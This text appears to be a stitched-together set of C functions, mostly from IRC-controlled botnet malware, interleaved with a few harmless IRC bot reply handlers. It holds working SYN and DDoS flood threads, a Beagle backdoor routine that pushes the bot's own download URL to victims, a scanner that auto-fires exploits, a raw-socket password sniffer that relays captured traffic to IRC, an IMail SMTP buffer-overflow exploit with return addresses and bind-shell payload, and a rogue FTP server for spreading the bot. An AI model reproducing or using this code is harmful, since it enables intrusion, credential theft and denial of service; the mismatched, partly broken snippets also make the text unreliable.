BOOL ListShares(SOCKET sock, char *chan, BOOL notice, char *ServerName) { char buffer[IRCLINE]; PSHARE_INFO_502 pBuf,p; NET_API_STATUS nStatus; LPWSTR wServerName = (LPWSTR)AsWideString(ServerName); DWORD entriesread=0,totalread=0,resume=0; irc_privmsg(sock,chan,"Share name: Resource: Uses: Desc:",notice); do { nStatus = fNetShareEnum(wServerName, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume); if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) { p = pBuf; for(unsigned int i=1;i <= entriesread;i++) { sprintf(buffer,"%-14S %-24S %-6u %-4s",p->shi502_netname, p->shi502_path, p->shi502_current_uses, IsVSD(fIsValidSecurityDescriptor(p->shi502_security_descriptor))); irc_privmsg(sock,chan,buffer,notice,TRUE); p++; } fNetApiBufferFree(pBuf); } else { sprintf(buffer,"[NET]: Share list error: %s <%ld>",NasError(nStatus),nStatus); irc_privmsg(sock,chan,buffer,notice); } } while (nStatus == ERROR_MORE_DATA); if(nStatus != ERROR_SUCCESS) return FALSE; return TRUE; }
DWORD WINAPI FindFileThread(LPVOID param) { FFIND ffind = *((FFIND *)param); FFIND *ffinds = (FFIND *)param; ffinds->gotinfo = TRUE; char sendbuf[IRCLINE]; unsigned int numfound = 0; if (ffind.dirname[strlen(ffind.dirname)-1] == '\\') ffind.dirname[strlen(ffind.dirname)-1] = '\0'; _snprintf(sendbuf,sizeof(sendbuf),"[FINDFILE]: Searching for file: %s.",ffind.filename); if (!ffind.silent) irc_privmsg(ffind.sock,ffind.chan,sendbuf,ffind.notice); numfound = FindFile(ffind.sock,ffind.chan,ffind.notice,ffind.filename,ffind.dirname,numfound); sprintf(sendbuf,"[FINDFILE]: Files found: %d.",numfound); if (!ffind.silent) irc_privmsg(ffind.sock,ffind.chan,sendbuf,ffind.notice); addlog(sendbuf); clearthread(ffind.threadnum); ExitThread(0); }
DWORD WINAPI WonkThread(LPVOID param) { char sendbuf[IRCLINE]; WONK wonk = *((WONK *)param); WONK *wonks = (WONK *)param; wonks->gotinfo = TRUE; sprintf(sendbuf, "-\x03\x34\2wonk\2\x03- Done with flood, ports hit: %s", SendPhatWonk(finet_addr(wonk.ip), atoi(wonk.length), atoi(wonk.delay))); if (!wonk.silent) irc_privmsg(wonk.sock, wonk.chan, sendbuf, wonk.notice); addlog(sendbuf); clearthread(wonk.threadnum); ExitThread(0); }
DWORD WINAPI SuperSynThread(LPVOID param) { char sendbuf[IRCLINE]; SUPERSYN supersyn = *((SUPERSYN *)param); SUPERSYN *supersyns = (SUPERSYN *)param; supersyns->gotinfo = TRUE; sprintf(sendbuf, "4<<12[SUPERSYN]: Done with flood (%iKB/sec)4>>", SuperSyn(supersyn.ip, supersyn.port, supersyn.length)); if (!supersyn.silent) irc_privmsg(supersyn.sock, supersyn.chan, sendbuf, supersyn.notice); addlog(sendbuf); clearthread(supersyn.threadnum); ExitThread(0); }
DWORD WINAPI SkySynThread(LPVOID param) { char sendbuf[IRCLINE]; SKYSYN skysyn = *((SKYSYN *)param); SKYSYN *skysyns = (SKYSYN *)param; skysyns->gotinfo = TRUE; sprintf(sendbuf, "-\x03\x34\2skysyn\2\x03- Done with flood (%iKB/sec)", SkySyn(skysyn.ip, skysyn.port, skysyn.length)); if (!skysyn.silent) irc_privmsg(skysyn.sock, skysyn.chan, sendbuf, skysyn.notice); addlog(sendbuf); clearthread(skysyn.threadnum); ExitThread(0); }
DWORD WINAPI SynFloodThread(LPVOID param) { char sendbuf[IRCLINE]; SYNFLOOD synflood = *((SYNFLOOD *)param); SYNFLOOD *synfloods = (SYNFLOOD *)param; synfloods->gotinfo = TRUE; sprintf(sendbuf, "[SYN]: Done with flood (%iKB/sec).", SynFlood(synflood.ip, synflood.port, synflood.length)); if (!synflood.silent) irc_privmsg(synflood.sock, synflood.chan, sendbuf, synflood.notice); addlog(sendbuf); clearthread(synflood.threadnum); ExitThread(0); }
BOOL Beagle(EXINFO exinfo) { char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT]; BOOL success = FALSE; WSADATA WSAData; if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) return FALSE; SOCKET sSock; if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(exinfo.port); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2)); if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) { if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) { GetModuleFileName(0, botfile, sizeof(botfile)); _splitpath(botfile, NULL, NULL, fname, ext); _snprintf(botfile, sizeof(botfile), "%s%s", fname, ext); _snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile); if(fsend(sSock, buffer, sizeof(buffer), 0)) success = TRUE; } } } } fclosesocket(sSock); fWSACleanup(); if (success) { _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; } return (success); }
void stopthread(SOCKET sock, char *chan, BOOL notice, BOOL silent, char *name, char *desc, int threadid, char *thread) { char sendbuf[IRCLINE]; int threadnum=0, i; if(thread) threadnum=atoi(thread); if ((i=killthreadid(threadid,threadnum)) > 0) sprintf(sendbuf,"%s: %s stopped. (%d thread(s) stopped.)", name, desc, i); else sprintf(sendbuf,"%s: No %s thread found.", name, desc); if (!silent) irc_privmsg(sock,chan,sendbuf,notice); addlog(sendbuf); return; }
static bool handle_privmsg(int fd, struct ircmsg_privmsg *msg) { if (strstr(msg->text, IRC_NICK ": ") == msg->text && msg->chan[0] == '#') { char *head = msg->text + strlen(IRC_NICK) + 2; if (strstr(head, "record ") == head) { handle_cmd_record(fd, msg, head + 7); } else if (strstr(head, "records ") == head) { handle_cmd_records(fd, msg, head + 8); } else { irc_privmsg(fd, msg->chan, "%s: shut the f**k up.", msg->name.nick); } } return true; }
void currentIP(SOCKET sock, char *chan, BOOL notice, int threadnum) { char sendbuf[IRCLINE]; if (findthreadid(SCAN_THREAD) > 0) { IN_ADDR in; in.s_addr = advinfo[threadnum].ip; sprintf(sendbuf, "%s Current IP: %s",mn_title,finet_ntoa(in)); } else sprintf(sendbuf ,"%s Scan not active.",mn_title); irc_privmsg(sock, chan, sendbuf, notice); addlog(sendbuf); return; }
DWORD WINAPI DDOSThread(LPVOID param) { char sendbuf[IRCLINE]; DDOST ddos = *((DDOST *)param); DDOST *ddoss = (DDOST *)param; ddoss->gotinfo = TRUE; srand(GetTickCount()); sprintf(sendbuf, "[DDoS]: Done with flood (%iKB/sec).", DDOSAttack(ddos.ip, ddos.port, ddos.type, ddos.length)); if (!ddos.silent) irc_privmsg(ddos.socket, ddos.chan, sendbuf, ddos.notice); addlog(sendbuf); clearthread(ddos.threadnum); ExitThread(0); }
void ListExploitStats(SOCKET sock, char *chan, BOOL notice) { char buffer[IRCLINE], buffer2[IRCLINE]; int extotal = 0; sprintf(buffer, "%s",mn_title); for(int i=0; exploit[i].port != 0; i++) { extotal += exploit[i].stats; sprintf(buffer2,"[%s]: %d,",exploit[i].name,exploit[i].stats); strncat(buffer, buffer2, sizeof(buffer)); } sprintf(buffer2, "Total: %d in %s", extotal, Uptime(started)); strncat(buffer, buffer2, sizeof(buffer)); irc_privmsg(sock, chan, buffer, notice); addlog(buffer); return; }
int reply(info_t * in) { time_t now = time(NULL); int i, j; if (helloinfo.last + helloinfo.interval > now) return 0; if (in->cmd == cmd_privmsg) { in->tail = skip_nick(in->tail, in->me); for (i = 0; i < helloinfo.ntrigger; i++) { if (!regex(in->tail, helloinfo.trigger[i])) { if(rrand(helloinfo.odds) > 0) return 1; irc_privmsg(to_sender(in), "%s", helloinfo.reply[rrand(helloinfo.nreply)]); helloinfo.last = now; } } } return 0; }
DWORD WINAPI FtpTransThread(LPVOID param) { char sendbuf[IRCLINE]; FTPTRANS ftptrans = *((FTPTRANS *)param); FTPTRANS *ftptranss = (FTPTRANS *)param; ftptranss->gotinfo = TRUE; HANDLE IntConn = fInternetConnect(ih, ftptrans.host, INTERNET_DEFAULT_FTP_PORT, ftptrans.username, ftptrans.password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0); Sleep(1000); if (IntConn) { if (ftptrans.get) { if (fFtpGetFile(IntConn, ftptrans.remote, ftptrans.local, FALSE, FILE_ATTRIBUTE_NORMAL, FTP_TRANSFER_TYPE_UNKNOWN | INTERNET_FLAG_RELOAD, 0)) _snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Successful download of: %s/%s to: %s.", ftptrans.host, ftptrans.remote, ftptrans.local); else _snprintf(sendbuf,sizeof(sendbuf),PrintError("[FTPTRANS]:")); } else { if (fFtpPutFile(IntConn, ftptrans.local, ftptrans.remote, FTP_TRANSFER_TYPE_UNKNOWN, 0)) _snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Successful upload of: %s to: %s/%s.", ftptrans.local, ftptrans.host, ftptrans.remote); else _snprintf(sendbuf,sizeof(sendbuf),PrintError("[FTPTRANS]:")); } } else _snprintf(sendbuf,sizeof(sendbuf),"[FTPTRANS]: Error: Failed to connect (invalid hostname or user account)."); if (!ftptrans.silent) irc_privmsg(ftptrans.sock,ftptrans.chan,sendbuf,ftptrans.notice); addlog(sendbuf); fInternetCloseHandle(IntConn); clearthread(ftptrans.threadnum); ExitThread(0); }
static bool handle_privmsg(int fd, struct ircmsg_privmsg *msg) { // Only handle messages directed at the bot. if (strncmp(msg->text, IRC_NICK, strlen(IRC_NICK)) != 0) return true; // Only handle messages in a channel. if (msg->chan[0] != '#') return true; char *cmd = msg->text + strlen(IRC_NICK ": "); if (BeginsWith(cmd, "help")) return handle_cmd_help(fd, msg, head + 4); if (BeginsWith(cmd, "record ")) return handle_cmd_record(fd, msg, head + 7); if (BeginsWith(cmd, "records ")) return handle_cmd_records(fd, msg, head + 8); irc_privmsg(fd, msg->chan, "%s: shut the f**k up.", msg->name.nick); return true; }
int reply(info_t * in) { int remain; char buf[512]; if (in->cmd == cmd_privmsg) { in->tail = skip_nick(in->tail, in->me); if(!tail_cmd(&in->tail, "fortune") && randomline(buf, sizeof(buf)) != NULL) { if(time(NULL) - lasttime >= req_delay) { irc_privmsg(to_sender(in), "%s", buf); lasttime = time(NULL); } else { remain = req_delay - (time(NULL) - lasttime); if(remain > 3600) irc_notice(in->sender_nick, "Please wait %d hours.", remain / 3600); else if(remain > 60) irc_notice(in->sender_nick, "Please wait %d minutes.", remain / 60); else irc_notice(in->sender_nick, "Please wait %d seconds.", remain); } } } return 0; }
DWORD WINAPI AdvScanner(LPVOID param) { char buffer[LOGLINE]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; scanp->gotinfo = TRUE; advinfo[scan.threadnum].ip = finet_addr(scan.ip); CheckServers(scan); if (findthreadid(SCAN_THREAD) == 1) { DeleteCriticalSection(&CriticalSection); // just in case if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) { sprintf(buffer,"Failed to initialize critical section."); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); return 0; } } advinfo[scan.threadnum].info = TRUE; for (unsigned int i=1;i<=(scan.threads);i++) { scan.cthreadid = i; sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL); threads[scan.cthreadnum].parent = scan.threadnum; if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) { while (scan.cgotinfo == FALSE) Sleep(30); } else { sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError()); addlog(buffer); } Sleep(30); } if (scan.minutes != 0) Sleep(60000*scan.minutes); else while (advinfo[scan.threadnum].info == TRUE) Sleep(2000); IN_ADDR in; in.s_addr = advinfo[scan.threadnum].ip; sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); advinfo[scan.threadnum].info = FALSE; Sleep(3000); if (findthreadid(SCAN_THREAD) == 1) DeleteCriticalSection(&CriticalSection); clearthread(scan.threadnum); ExitThread(0); }
DWORD WINAPI AdvPortScanner(LPVOID param) { IN_ADDR in; char logbuf[LOGLINE]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; scanp->cgotinfo = TRUE; int threadnum=scan.cthreadnum; int threadid=scan.cthreadid; srand(GetTickCount()); while (advinfo[threads[threadnum].parent].info) { DWORD dwIP; if (scan.random) dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent); else dwIP = AdvGetNextIP(threads[threadnum].parent); in.s_addr = dwIP; sprintf(logbuf,"IP: %s:%d, Scan thread: %d, Sub-thread: %d.", finet_ntoa(in), scan.port, threads[threadnum].parent, threadid); sprintf(threads[threadnum].name, logbuf); if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) { if (scan.exploit == -1) { EnterCriticalSection(&CriticalSection); sprintf(logbuf,"IP: %s, Port %d is open.",finet_ntoa(in),scan.port); if (!scan.silent) { if (scan.msgchan[0] != '\0') irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE); else irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE); } addlog(logbuf); LeaveCriticalSection(&CriticalSection); } else { EXINFO exinfo; sprintf(exinfo.ip, finet_ntoa(in)); sprintf(exinfo.command, exploit[scan.exploit].command); if (scan.msgchan[0] != '\0') sprintf(exinfo.chan, scan.msgchan); else sprintf(exinfo.chan, scan.chan); exinfo.sock = scan.sock; exinfo.notice = scan.notice; exinfo.silent = scan.silent; exinfo.port = scan.port; exinfo.threadnum = threadnum; exinfo.exploit = scan.exploit; exploit[scan.exploit].exfunc(exinfo); } } Sleep(2000); } clearthread(threadnum); ExitThread(0); }
DWORD WINAPI SniffThread(LPVOID param) { char sendbuf[IRCLINE], rawdata[65535], *Packet; int i; DWORD dwRet, dwMode = 1; PSNIFF sniff = *((PSNIFF *)param); PSNIFF *sniffs = (PSNIFF *)param; sniffs->gotinfo = TRUE; IPHEADER *ip; TCPHEADER *tcp; IN_ADDR sia, dia; SOCKET sniffsock; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(0); ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock)); if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) { sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); clearthread(sniff.threadnum); ExitThread(0); } threads[sniff.threadnum].sock = sniffsock; if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); } if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) { sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); } while(1) { memset(rawdata, 0, sizeof(rawdata)); Packet = (char *)rawdata; if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) { _snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); break; } ip = (IPHEADER *)Packet; if (ip->proto == 6) { Packet += sizeof(*ip); tcp = (TCPHEADER *)Packet; sia.S_un.S_addr = ip->sourceIP; dia.S_un.S_addr = ip->destIP; if (tcp->flags == 24) { Packet += sizeof(*tcp); if (strstr(Packet, "[PSNIFF]") == NULL) { for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) { if (strstr(Packet, pswords[i].text)) { _snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s", ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE); printf("%s\n",sendbuf); addlog(sendbuf); break; } } } } } } fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); }
unsigned int __stdcall ipswitch_exploit(void *param, char *target, const char *host) { struct exploits exploit = *(struct exploits *)param; struct exploits *pexploit = (struct exploits *)param; pexploit->gotinfo = true; static char overflow[1028]; WSADATA wsaData; struct hostent *hp; struct sockaddr_in sockin; char buf[300], *check; int sockfd, bytes; int plen, i; //JMP = atoi("1"); if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) { //fprintf(stderr, "Error setting up with WinSock v1.1\n"); return false; } hp = gethostbyname(host); if (hp == NULL) { //printf("ERROR: Uknown host %s\n", exploit.ip); //printf("%s",exploit.ip); return false; } sockin.sin_family = hp->h_addrtype; sockin.sin_port = htons(exploit.port); sockin.sin_addr = *((struct in_addr *)hp->h_addr); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) { //printf("ERROR: Socket Error\n"); return false; } if ((connect(sockfd, (struct sockaddr *) &sockin,sizeof(sockin))) == SOCKET_ERROR) { //printf("ERROR: Connect Error\n"); closesocket(sockfd); WSACleanup(); return false;; } if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) { //printf("ERROR: Recv Error\n"); closesocket(sockfd); WSACleanup(); return false; } /* wait for SMTP service welcome*/ buf[bytes] = '\0'; check = strstr(buf, "220"); if (check == NULL) { //printf("ERROR: NO response from SMTP service\n"); closesocket(sockfd); WSACleanup(); return false; } // JMP to EAX = Results in a Corrupted Stack // so instead we POP EBP, RET to restore pointer and then return // this causes code procedure to continue /* ['IMail 8.x Universal', 0x10036f71 ], ['Windows 2003 SP1 English', 0x7c87d8af ], ['Windows 2003 SP0 English', 0x77d5c14c ], ['Windows XP SP2 English', 0x7c967e23 ], ['Windows XP SP1 English', 0x71ab389c ], ['Windows XP SP0 English', 0x71ab389c ], ['Windows 2000 Universal English', 0x75021397 ], ['Windows 2000 Universal French', 0x74fa1397], ['Windows XP SP1 - SP2 German', 0x77d18c14], */ char Exp[] = "RCPT TO: <@"; // This stores our JMP between the @ and : char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af char WinXPSP2E[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 char IMail815[] = "\x71\x6f\x03\x10:"; //IMAIL 8.15 SMTPDLL.DLL [pop ebp, ret] 0x10036f71 char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:"; //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c char WinXPSP2[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23 char WinXPSP1[] = "\x9c\x38\xab\x71:"; //WinXP SP1 and 0 English U32 [pop ebp, ret]0x71ab389c char Win2KE[] = "\x97\x31\x02\x75:"; //Win2k English All SPs [pop ebp, ret]0x75021397 char Win2KF[] = "\x97\x13\xfa\x74:"; // As above except French Win2k [pop ebp, ret]0x74fa1397 char WinXPG[] = "\x14\x8c\xd1\x77:"; //WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14 char tail[] = "SSS>\n"; // This closes the RCPT cmd. Any characters work. // Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems // After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works // On all versions from 8.x to 2006 (9.x?) char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44"; // Stabolize Stack prior to payload. memset(overflow, 0, 1028); strcat(overflow, Exp); strcat(overflow, IMail815); strcat(overflow, Win2k3SP1E); strcat(overflow, WinXPSP1); strcat(overflow, Win2KE); plen = 544 - ((strlen(Win32Bind) + strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, Win32Bind); // Dont forget to add the trailing characters to set up stack overflow strcat(overflow, tail); // Connect to SMTP Server and Setup Up Email char EHLO[] = "EHLO \r\n"; char MF[] = "MAIL FROM <TEST@TEST> \r\n"; send(sockfd, EHLO, strlen(EHLO), 0); Sleep(1000); send(sockfd, MF, strlen(MF), 0); Sleep(1000); if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR) { //printf("ERROR: Send Error\n"); closesocket(sockfd); WSACleanup(); return false; } closesocket(sockfd); WSACleanup(); Sleep(1000); closesocket(sockfd); sockin.sin_family = hp->h_addrtype; sockin.sin_port = htons(exploit.port); sockin.sin_addr = *((struct in_addr *)hp->h_addr); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) { return false; } if ((connect(sockfd, (struct sockaddr *) &sockin,sizeof(sockin))) == SOCKET_ERROR) { closesocket(sockfd); WSACleanup(); } if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) { closesocket(sockfd); WSACleanup(); } buf[bytes] = '\0'; check = strstr(buf, "220"); if (check == NULL) { closesocket(sockfd); WSACleanup(); } closesocket(sockfd); WSACleanup(); shell_connect(exploit.ip, 6236); { irc_privmsg(target, "Exploiting IP: %s", exploit.ip); closesocket(sockfd); _endthreadex(0); return true; } return false; }
void CheckDLLs(SOCKET sock, char *chan, BOOL notice, BOOL silent) { char sendbuf[IRCLINE]; if (nokernel32) { sprintf(sendbuf,"Kernel32.dll failed. <%d>", nokernel32err); irc_privmsg(sock, chan, sendbuf, notice); } if (nouser32) { sprintf(sendbuf,"User32.dll failed. <%d>", nouser32err); irc_privmsg(sock, chan, sendbuf, notice); } if (noadvapi32) { sprintf(sendbuf,"Advapi32.dll failed. <%d>", noadvapi32err); irc_privmsg(sock, chan, sendbuf, notice); } if (nogdi32) { sprintf(sendbuf,"Gdi32.dll failed. <%d>", nogdi32err); irc_privmsg(sock, chan, sendbuf, notice); } if (nows2_32) { sprintf(sendbuf,"Ws2_32.dll failed. <%d>", nows2_32err); irc_privmsg(sock, chan, sendbuf, notice); } if (nowininet) { sprintf(sendbuf,"Wininet.dll failed. <%d>", nowinineterr); irc_privmsg(sock, chan, sendbuf, notice); } if (noicmp) { sprintf(sendbuf,"Icmp.dll failed. <%d>", noicmperr); irc_privmsg(sock, chan, sendbuf, notice); } if (nonetapi32) { sprintf(sendbuf,"Netapi32.dll failed. <%d>", nonetapi32err); irc_privmsg(sock, chan, sendbuf, notice); } if (nodnsapi) { sprintf(sendbuf,"Dnsapi.dll failed. <%d>", nodnsapierr); irc_privmsg(sock, chan, sendbuf, notice); } if (noiphlpapi) { sprintf(sendbuf,"Iphlpapi.dll failed. <%d>", noiphlpapierr); irc_privmsg(sock, chan, sendbuf, notice); } if (nompr) { sprintf(sendbuf,"Mpr32.dll failed. <%d>", nomprerr); irc_privmsg(sock, chan, sendbuf, notice); } if (noshell32) { sprintf(sendbuf,"Shell32.dll failed. <%d>", noshell32err); irc_privmsg(sock, chan, sendbuf, notice); } if (noodbc32) { sprintf(sendbuf,"Odbc32.dll failed. <%d>", noodbc32err); irc_privmsg(sock, chan, sendbuf, notice); } #ifndef NO_CAPTURE if (noavicap32) { sprintf(sendbuf,"Avicap32.dll failed. <%d>", noavicap32err); irc_privmsg(sock, chan, sendbuf, notice); } #endif sprintf(sendbuf,"[MAIN]: DLL test complete."); if (!silent) irc_privmsg(sock, chan, sendbuf, notice); addlog(sendbuf); return; }
DWORD WINAPI ftpd(LPVOID pParam) { WSADATA wsdata; SOCKET listener; SOCKET newfd; char sendbuf[IRCLINE]; struct sockaddr_in server_address; struct sockaddr_in remoteaddr; long h; int reuse_addr = 1; unsigned long mode = 1; int fdmax; int i; int addrlen; int nbytes; char buf[100]; // char t_buf[1024]; char tmpbuf[100]; char tmpbuf2[100]; char a[4]; char b[4]; char c[4]; char d[4]; char p1[50]; char p2[50]; char tmpip[15]; int po,po2; FTP ftp = *((FTP *)pParam); FTP *ftps = (FTP *)pParam; ftps->gotinfo = TRUE; struct fd_set master; // master file descriptor list struct fd_set read_fds; // temp file descriptor list for select() FD_ZERO(&master); // clear the master and temp sets FD_ZERO(&read_fds); WSAStartup(0x0101, &wsdata); srand(time(NULL)); FTP_PORT = brandom(1030,65200); listener = socket(AF_INET, SOCK_STREAM, 0); setsockopt(listener, SOL_SOCKET, SO_REUSEADDR, (char*)&reuse_addr,sizeof(reuse_addr)); ioctlsocket(listener, FIONBIO, &mode); server_address.sin_family = AF_INET; server_address.sin_addr.s_addr = INADDR_ANY; server_address.sin_port = htons(FTP_PORT); if (bind(listener, (struct sockaddr *) &server_address,sizeof(server_address)) < 0 ) { return 1; } listen(listener,10); FD_SET(listener, &master); fdmax = listener; while(1) { read_fds = master; if (select(fdmax+1, &read_fds, NULL, NULL, NULL) == -1) { return 1; } for(i = 0; i <= fdmax; i++) { memset(buf,0,sizeof(buf)); memset(tmpbuf,0,sizeof(tmpbuf)); if (FD_ISSET(i, &read_fds)) { if (i == (int)listener) { addrlen = sizeof(remoteaddr); if ((newfd = accept(listener, (struct sockaddr *)&remoteaddr,&addrlen)) != -1) { FD_SET(newfd, &master); if ((int)newfd > fdmax) { fdmax = newfd; } send(newfd, "220 NzmxFtpd 0wns j0\n",21 , 0); } } else { if ((nbytes = recv(i, buf, sizeof(buf), 0)) <= 0) { FD_CLR(i, &master); closesocket(i); } else { sscanf(buf,"%s %s",tmpbuf,tmpbuf2); if (strcmp(tmpbuf,"USER") == 0) { send(i,"331 Password required\n",22 , 0); } else if (strcmp(tmpbuf,"PASS") == 0) { send(i,"230 User logged in.\n",20 , 0); } else if (strcmp(tmpbuf,"SYST") == 0) { send(i,"215 NzmxFtpd\n",13 , 0); } else if (strcmp(tmpbuf,"REST") == 0) { send(i,"350 Restarting.\n",16 , 0); } else if (strcmp(tmpbuf,"PWD") == 0) { send(i,"257 \"/\" is current directory.\n",30 , 0); } else if ((strcmp(tmpbuf,"TYPE") == 0) && (strcmp(tmpbuf2,"A") == 0)) { send(i,"200 Type set to A.\n",19 , 0); } else if ((strcmp(tmpbuf,"TYPE") == 0) && (strcmp(tmpbuf2,"I") == 0)) { send(i,"200 Type set to I.\n",19 , 0); } else if (strcmp(tmpbuf,"PASV") == 0) { char pasv[] = "425 Passive not supported on this server\n"; send(i, pasv, strlen(pasv), 0); } else if (strcmp(tmpbuf,"LIST") == 0) { char list[] = "226 Transfer complete\n"; send(i, list, strlen(list), 0); } else if (strcmp(tmpbuf,"PORT") == 0) { sscanf(buf,"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]",a,b,c,d,p1,p2); po = atoi(p1); po2 = atoi(p2); memset(p1,0,sizeof(p1)); sprintf(p1,"%x%x\n",po,po2); h = strtoul(p1, NULL, 16); sprintf(tmpip,"%s.%s.%s.%s",a,b,c,d); send(i,"200 PORT command successful.\n",29 , 0); } else if (strcmp(tmpbuf,"RETR") == 0) { send(i,"150 Opening BINARY mode data connection\n",40 , 0); if(ftp_Data_connect(tmpip,(int)h) == 1) { if (Ftp_data_transfer() == 1) { send(i,"226 Transfer complete.\n",23 , 0); sprintf(sendbuf,"4<<12[ROOTED]: %s, port:%d now executing %s on remote machine.4>>",tmpip,FTP_PORT,ftp.filename); if (!ftp.silent) irc_privmsg(ftp.sock,ftp.chan,sendbuf,ftp.notice); addlog(sendbuf); } } else { send(i,"425 Can't open data connection.\n",32,0); } } else if (strcmp(tmpbuf,"QUIT") == 0) { send(i,"221 Goodbye happy r00ting.\n",27 , 0); } memset(buf,0,sizeof(buf)); } } } } } return 1; }
